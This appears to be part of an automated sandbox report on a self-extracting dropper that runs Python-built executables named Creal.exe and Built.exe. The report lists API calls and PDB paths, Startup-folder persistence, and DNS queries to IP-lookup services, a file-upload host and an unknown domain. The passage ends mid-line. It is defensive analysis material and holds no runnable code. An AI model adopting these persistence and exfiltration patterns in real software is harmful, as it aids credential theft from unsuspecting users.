              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21992 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new_ex,OPENSSL_sk_num,X509_VERIFY_PARAM_new,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,5_2_00007FFD8AF21992
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4D510 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,5_2_00007FFD8AF4D510
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF2193D
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A265124 i2d_X509,PyBytes_FromStringAndSize,CRYPTO_free,5_2_00007FFD9A265124
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A2653DC ASN1_STRING_type,ASN1_STRING_length,ASN1_STRING_get0_data,Py_BuildValue,ASN1_STRING_to_UTF8,_Py_Dealloc,Py_BuildValue,CRYPTO_free,5_2_00007FFD9A2653DC
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: Built.exe, 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000004.00000002.2174319027.00007FFD9253F000.00000040.00000001.01000000.0000001F.sdmp, Creal.exe, 00000005.00000002.2432361806.00007FFD89E27000.00000002.00000001.01000000.00000032.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: Built.exe, 00000004.00000002.2175008965.00007FFD93A12000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B3A2000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: Creal.exe, 00000002.00000003.2116245484.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000004.00000002.2211113612.00007FFDA5B81000.00000040.00000001.01000000.00000014.sdmp, Creal.exe, 00000005.00000002.2438100824.00007FFD9F7F3000.00000002.00000001.01000000.0000002B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000004.00000002.2207256705.00007FFDA46E1000.00000040.00000001.01000000.0000000D.sdmp, Creal.exe, 00000005.00000002.2437686483.00007FFD9F3D3000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Creal.exe, 00000002.00000003.2115776871.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Built.exe, Built.exe, 00000004.00000002.2205132237.00007FFDA3AE1000.00000040.00000001.01000000.0000001D.sdmp, Creal.exe, 00000005.00000002.2438752621.00007FFDA3BF6000.00000002.00000001.01000000.00000028.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: Built.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Creal.exe, 00000005.00000002.2437048857.00007FFD9DA42000.00000002.00000001.01000000.00000026.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2208486691.00007FFDA4DA1000.00000040.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2209383720.00007FFDA54BE000.00000040.00000001.01000000.00000010.sdmp, Creal.exe, 00000005.00000002.2438283541.00007FFDA086D000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000000.2087291779.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp, #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, Built.exe, 00000004.00000002.2206641962.00007FFDA4331000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2202084879.00007FFDA35A1000.00000040.00000001.01000000.00000011.sdmp, Creal.exe, 00000005.00000002.2433119716.00007FFD8A1FF000.00000002.00000001.01000000.0000002E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Creal.exe, 00000005.00000002.2417262722.00000203E7250000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: Creal.exe, 00000005.00000002.2435297538.00007FFD93FA8000.00000002.00000001.01000000.00000015.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000004.00000002.2193375861.00007FFDA33E1000.00000040.00000001.01000000.00000017.sdmp, Creal.exe, 00000005.00000002.2436764632.00007FFD9A26E000.00000002.00000001.01000000.0000002C.sdmp
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60638647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60638647C
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60639ECE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063B3130 FindFirstFileExA,0_2_00007FF6063B3130
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9249280 FindFirstFileExW,FindClose,2_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E289280 FindFirstFileExW,FindClose,3_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E289280 FindFirstFileExW,FindClose,4_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9249280 FindFirstFileExW,FindClose,5_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6D9261874
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ifconfig.me
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49726
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49956
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.meUser-Agent: curl/7.83.1Accept: */*
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.meUser-Agent: curl/7.83.1Accept: */*
              Source: global trafficDNS traffic detected: DNS query: blank-v1rwt.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: ifconfig.me
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: api.gofile.io
              Source: global trafficDNS traffic detected: DNS query: geolocation-db.com
              Source: Creal.exe, 00000005.00000003.2411511224.00000203E7B17000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B17000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2365364395.00000203E799D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2388738513.00000203E7B17000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2420552762.00000203E7B19000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2377385278.00000203E7B17000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B17000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2409168432.00000203E799E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
              Source: Creal.exe, 00000005.00000003.2372707280.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369898360.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376137526.00000203E8430000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380069030.00000203E7545000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2411200731.00000203E754A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380581302.00000203E8451000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412123973.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376742548.00000203E843A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2383027569.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2377974542.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381479785.00000203E784F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374846297.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376177154.00000203E8437000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373487338.00000203E785E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381601278.00000203E7855000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2408501019.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyusering.com/2012/05/how-to-choose-authenticated-encryption.html
              Source: Creal.exe, 00000002.00000003.2114552537.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117119142.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117531945.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.dig
              Source: Creal.exe, 00000002.00000003.2442922105.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117355623.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2107749535.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: Built.exe, 00000003.00000003.2107749535.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi3
              Source: Creal.exe, 00000002.00000003.2116656541.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116495637.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2127851067.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125640719.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115508487.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115537759.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114798447.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116780837.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116267220.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115748966.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116267220.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114798447.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125640719.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115508487.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115537759.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115287831.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115748966.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 